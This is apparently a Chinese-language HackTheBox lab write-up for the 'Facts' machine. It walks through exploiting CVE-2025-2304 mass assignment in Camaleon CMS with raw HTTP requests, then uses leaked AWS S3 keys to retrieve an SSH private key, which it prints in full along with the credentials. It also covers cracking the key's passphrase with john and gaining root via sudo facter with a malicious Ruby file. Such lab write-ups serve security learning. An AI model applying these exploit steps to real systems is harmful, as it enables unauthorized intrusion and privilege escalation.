---
# System prepended metadata

title: HTB Facts

---

[TOC]
## Fact
https://app.hackthebox.com/machines/Facts?sort_by=created_at&sort_type=desc

![image](https://hackmd.io/_uploads/Sy72Z85sWe.png)

### 找服務&版本
:::info
nmap 10.129.244.96 -sV -A
:::
知道目標有開 80、22 port
![image](https://hackmd.io/_uploads/r1uUSHqoZl.png)

根據找的的版本去查詢有沒有能利用的 CVE，結果沒找到...

### 80 port
實際到網頁看，發現他就是個類似部落格的網站，從下圖判斷這是一個 Camaleon CMS，這是一款基於 Ruby on Rails 的動態高級內容管理系統
![image](https://hackmd.io/_uploads/HJx9NBqibg.png)

再繼續逛發現 /page 跟 /search，但是對他們的參數做 fuzz 沒發現什麼有趣的回應，嘗試爆破路徑，發現有 admin 路徑，只是被 redirect 了，跟著跳轉過去發現是個登入頁
![image](https://hackmd.io/_uploads/HyzmNBcibl.png)
![image](https://hackmd.io/_uploads/ByNmvBcsbl.png)

原本看 Camaleon CMS 現有較大的漏洞 CVE-2025-2304、CVE-2024-46986 還沒有想法，找到登入頁後好像可以試 CVE-2025-2304


### CVE-2025-2304
:::info
問題發生在 .permit!
他會把 params.require 帶著的 用戶輸入的值整個塞進資料庫裡面
假設輸入內容像這樣 : `{ "password" => "hacked123", "role" => "admin", "is_admin" => true }`
.permit! 就會去對應欄位把值塞進去，如果有 role 或 is_admin 欄位，那成功更改裡面的值就能提權

```
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end
```

:::


http://facts.htb/admin/login
```
POST /admin/login HTTP/1.1

Host: facts.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: _factsapp_session=%2FdC6I7ol%2Bst1r8szKGGGd70DRB9lRXDhhXapQn9cj%2BNXGJ8CACjSbX3pDH7h2WxSsUac4olxtHkj5MlSuklGUWJjdAakFEDEvpOizWVRMWRLoS6LJz1YfY6Oe96cRvdwKmy98PxakYZR76hMPYya2tCVsebe3NFWhCNkD9dR%2B9AXV1JNL6aFEW1alO1uSN1wrJvldrlTzZXW9e7z2Fe4P0XGQLMtGx1BgoRC6PBw80UbCRVM6snFHEKVu91JWri7RLWZk78yde%2FEDeb061oZZdSZ3%2B9LDmsZts7%2BrxkRIzB7DhuBGqddEA9WWh6M3KYGwIzOz4RAiLAMuWclxOdjtzaZn4mk55YbG5hcmB3dLhjJ%2Fy6Yx9fahx0%3D--mqau9n9PDQ0g%2Bqre--uFsKcWyH3o%2BNbCdVzVvxYQ%3D%3D

Connection: close



authenticity_token=5J91WenYidkCIXYmi6EDjxwxlXNodhEqVxWcKDOpP5MxjQ2zhHbhQpgp0dTvvFFQ91oe2yffVaRDbXW_gpE6TQ&user%5Busername%5D=bali&user%5Bpassword%5D=bali123&user%5Brole%5D=admin&user%5Bis_admin%5D=true
```

```
POST /admin/users/5 HTTP/1.1

Host: facts.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: auth_token=uQJH7h7nrGq_Co1ogCX2-A%26Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F120.0.0.0+Safari%2F537.36%2610.10.17.197; _factsapp_session=N64ab2HTYUUR9dmltZwhf7yhHbQ%2B9%2BmU6WSWp3cF8YK4%2Fw50LQJgcs0G97kSQEKm74kMY93%2BWNRDJhee79rFGAk4Cdjbio7z7%2FqUUp%2BK0Du25IjbJ6dKrCRBf7R2fvy81ifNQNhqtCm02KgNxka%2FhYP95QfvDQN8FJEpww9Z6bns9j0FST9pjKQOhEig8HnaV%2Bs6RQQ9AOulWV0zULr3J5RFd%2F6cdf8fU7lPfPZlZoAT8mBuoj62ejYJC5WBy3IdbAHCqqxv3QSpWxliiEFB0ltlVEbzEc5CfNsaJqvIvm8kX%2FXH6u%2FFjJlWHNtYh%2F8%2FmF%2FG3vDZZCz0pQfIyxoxsaBWd3MXCVdzRIanf59mjfcKYEeuNJ0Rt0E%3D--S10wtQURSEyIy0vX--sHUYaQ6RoMiuBwDsaU8zEw%3D%3D

Connection: close



_method=patch&authenticity_token=EpeFMQpTE_8sm88Uh13SfCn7mgL0WYSutwnIVelCr7pZNz5ijiIZDsBQA3ztn8aakjTdrN_Rknx9FSMdv9pIvg&meta%5Bavatar%5D=&user%5Busername%5D=bali&user%5Bemail%5D=test%40test.com&user%5Bfirst_name%5D=bali&user%5Blast_name%5D=lin&meta%5Bslogan%5D=123&user%5Brole%5D=admin&user%5Bis_admin%5D=true
```
自己試一直失敗，使用現成的 CVE 開源 poc 工具
https://github.com/d3vn0mi/cve-2025-2304-poc
最後成功的是 `password[role]=admin`，不是 user[role]=admin
![image](https://hackmd.io/_uploads/ByCQfHfhbe.png)

成為 admin 了
![image](https://hackmd.io/_uploads/SJHHVrGhZg.png)

到處翻翻看看發現 AWS s3 資訊
![image](https://hackmd.io/_uploads/Bk5pZuQnZl.png)
```
AKIA808C72183237BB40
ZkKBOjSNm2V82l3w6Pu2+JcRe8PS2bTwaipboiaW
randomfacts
us-east-1
http://localhost:54321
http://facts.htb/randomfacts
```
### 利用 AWS s3

設使用者之後才能使用
```
aws configure --profile facts
```

一直在 randomfacts 下嘗試，都只有圖片檔
也嘗試丟奇怪的東西上去 但也沒有用 s3 不會去執行
```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls s3://randomfacts/ --recursive
```
![image](https://hackmd.io/_uploads/rJ8ffd72Zg.png)

之後問 AI 知道怎麼列 Bucket 名稱，發現 s3://internal
```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls
```
![image](https://hackmd.io/_uploads/S1jumdmnZe.png)

找到 s3://internal 去列出底下有哪些資料，下面看到 .ssh/id_ed25519 私鑰
```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls s3://internal --recursive
```
![image](https://hackmd.io/_uploads/HJoHEOm3be.png)

但是這裡沒辦法用 cat 來顯示，所以用 cp 複製到 - 表示 stdout
```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 cp s3://internal/.ssh/id_ed25519 -

```

:::success
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBLs0gLF4
f3h4rIOAN0rEVWAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIKSV0hsk3XXWG35D
Ee0iM+VycFL1iX7XT2+EZEca0JT+AAAAoKRfk3KY9C5sh1631FGpWKcFnGkYYDRLcvFjCc
SpOX1fWyvAsgiWekvdlSDa9wvnXSNMgSIqeMRhvbcCnbG7O/scfB7JB76wjdkA04HIZW8n
eA95dUj/xnFM7yMC7dUs50F+JAy+ySCDAUiCGdu7qrjIiNIev35IVraXROfDPZG2La3W1w
tOnayYMscBftBBuprbvIxIEEZolYLCfFeIQm4=
-----END OPENSSH PRIVATE KEY-----

:::

順便看一下 .profile 可能會有關環境中重要的線索
:::success
\# ~/.profile: executed by the command interpreter for login shells.
\# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
\# exists.
\# see /usr/share/doc/bash/examples/startup-files for examples.
\# the files are located in the bash-doc package.
\# the default umask is set in /etc/profile; for setting the umask
\# for ssh logins, install and configure the libpam-umask package.
\#umask 022

\# if running bash
if [ -n "\$BASH_VERSION" ]; then
    \# include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "\$HOME/.bashrc"
    fi
fi

\# set PATH so it includes user's private bin if it exists
if [ -d "\$HOME/bin" ] ; then
    PATH="\$HOME/bin:$PATH"
fi

\# set PATH so it includes user's private bin if it exists
if [ -d "\$HOME/.local/bin" ] ; then
    PATH="\$HOME/.local/bin:$PATH"
fi

:::

### ssh 連線
雖然有私鑰了，但是還是不知道帳號是誰
試過以下幾種
```
id_ed25519
admin
internal
randomfacts
```

如果把拿到的金鑰直接拿去用會出現這個錯誤
:::info
WARNING: UNPROTECTED PRIVATE KEY FILE! 
:::
要把它消掉需要設定金鑰的存取權，改成 600
```
chmod 600 htbKey
```


之後也有發現這個錯誤，意思是這個私鑰有被密碼保護，所以需要密碼
:::info
Load key "sshKey": incorrect passphrase supplied to decrypt private key
:::
為什麼會出現上面那個訊息，是因為我想用 `ssh-keygen -y -f sshKey` 這個指令找到登入的帳號，但是因為需要密碼所以要去爆破了

#### 爆破密碼
先轉格式
```
ssh2john sshKey > sshKey.hash
```
再用 john 爆破，看密碼
```
john --wordlist=/usr/share/wordlists/rockyou.txt sshKey.hash

john --show sshKey.hash 
```
<!-- ![image](https://hackmd.io/_uploads/r18cnKm2Wl.png) -->

#### 找 ssh 帳號
知道密碼後重新回來這個指令，他把對應的公鑰格式印出來，就會包含帳號
```
ssh-keygen -y -f sshKey
```
:::success
Enter passphrase for "sshKey": 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKSV0hsk3XXWG35DEe0iM+VycFL1iX7XT2+EZEca0JT+ trivia@facts.htb

:::

現在有私鑰、私鑰密碼、帳號 就可以來 ssh 了
成功進到目標電腦拿到第一個 flag
![image](https://hackmd.io/_uploads/S19uatm2-x.png)

### 提權
<!-- 嘗試提權，從最常見的步驟開始，找可以用 root 權限執行的檔案
```
find / -perm -u=s -type f 2>/dev/null
```
- -perm：代表搜尋特定的權限
- -type f : 表示類型為檔案
-->


提權先找 sudo 列表，發現 /usr/bin/facter 這個檔案不用密碼就可以用
```
sudo -l
```
:::success
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

:::

去找 https://gtfobins.org/ 看要怎麼利用 facter

facter 問題發生在，它允許使用者寫自定義的 Ruby 腳本來擴充功能
facter 執行時，它會主動去尋找並執行這些 .rb 檔案
![image](https://hackmd.io/_uploads/HJjzGcQnbg.png)

所以先寫一個惡意的 rb 檔案
```
echo 'exec "/bin/bash"' > /tmp/exploit.rb
```
用 sudo 利用 facter 去把惡意檔案起起來
```
sudo facter --custom-dir=/tmp x
```
![image](https://hackmd.io/_uploads/BylFz9mnWe.png)

就可以去找第二個 flag 了